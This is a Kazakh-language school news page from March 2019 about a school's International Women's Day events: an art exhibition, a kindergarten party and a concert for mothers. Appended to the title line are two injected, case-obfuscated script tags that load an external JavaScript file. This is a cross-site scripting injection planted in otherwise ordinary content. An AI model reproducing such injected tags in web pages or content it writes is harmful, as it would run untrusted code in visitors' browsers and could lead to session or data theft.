8- наурыз Халықаралық әйелдер күні<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.03.2019

Кеңес орта мектебіндегі  «8- наурыз  Халықаралық әйелдер күні» мерекесін қарсы алу

 

     5-наурыз  күні 1-5 сынып аралығында «Ана –өмірдің шуағы» сурет көрмесі ұйымдастырылды.1-орынға 1-сынып,2-орынға 4-сынып,3-орынға 2-3сынып ие болды.

   6-наурыз күні «Балбөбек» шағын орталығында «Асыл анашым»мерекелік ертеңгілігі өтті.Бүлдіршіндердің аналарына деген ыстық сезімдері әнмен,бимен қызықты ойындармен көрермен көңілінен шықты.Асыл аналарымыздың мерекесіне орай ұйымдастырылған ертеңгілігі өте тамаша өтті.

       7-наурыз күні«Ана деген тіршіліктің тірегі»мерекелік концерт өтті.

  Оқушылар аналар туралы көптеген тақпақтар мен әндер айтып, лебіздерін білдірді.  Мерекелік іс-шара барысында ұстаздар қауымы «Анашым» әнін хормен орындады. Кеш соңында  Ата-аналар ризашылықтарын білдіріп,жылы тілектерін ұжымға айтып кетті.

 

                           Тәрбие-ісінің меңгерушісі:          Ахметкалиева К.Б

        

Просмотров: 892


Пікір қосу



Деректерді қолтаңбаға қосу